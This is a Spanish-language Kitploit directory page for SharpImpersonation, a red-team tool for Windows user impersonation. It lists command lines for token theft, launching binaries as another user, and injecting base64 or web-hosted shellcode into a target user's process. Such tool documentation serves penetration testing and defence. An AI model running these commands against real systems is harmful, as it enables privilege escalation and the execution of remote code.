Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpImpersonation — Una herramienta de suplantación de usuario - mediante inyección de token o shellcode | Kitploit
Herramientas/GitHubGitHub/s3cur3th1ssh1t/sharpimpersonation
Escalada de PrivilegiosHerramientas de SuplantaciónPost-ExplotaciónRed Teaming
GitHubs3cur3th1ssh1t/sharpimpersonation

SharpImpersonation

Una herramienta de suplantación de usuario - mediante inyección de token o shellcode

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
42175hace 4 añosRevisado por Kitploit

SharpImpersonation

Este fue un proyecto de aprendizaje práctico de mi parte. Se utilizan técnicas bien conocidas para construir solo otra herramienta de suplantación con algunas mejoras en comparación con otras herramientas públicas. La base de código se tomó de:

  • https://github.com/0xbadjuju/Tokenvator

Una publicación de blog para la introducción se puede encontrar aquí:

  • https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

Listar procesos del usuario

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe list

alt text

Listar solo procesos elevados

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe list elevated

Suplantar el primer proceso del usuario objetivo para iniciar un nuevo binario

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

alt text

Inyectar shellcode codificado en base64 en el primer proceso del usuario objetivo

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

alt text

Inyectar shellcode cargado desde un servidor web en el primer proceso del usuario objetivo

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

alt text

Suplantar al usuario objetivo mediante ImpersonateLoggedOnuser para la sesión actual

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

alt text

Descargar herramienta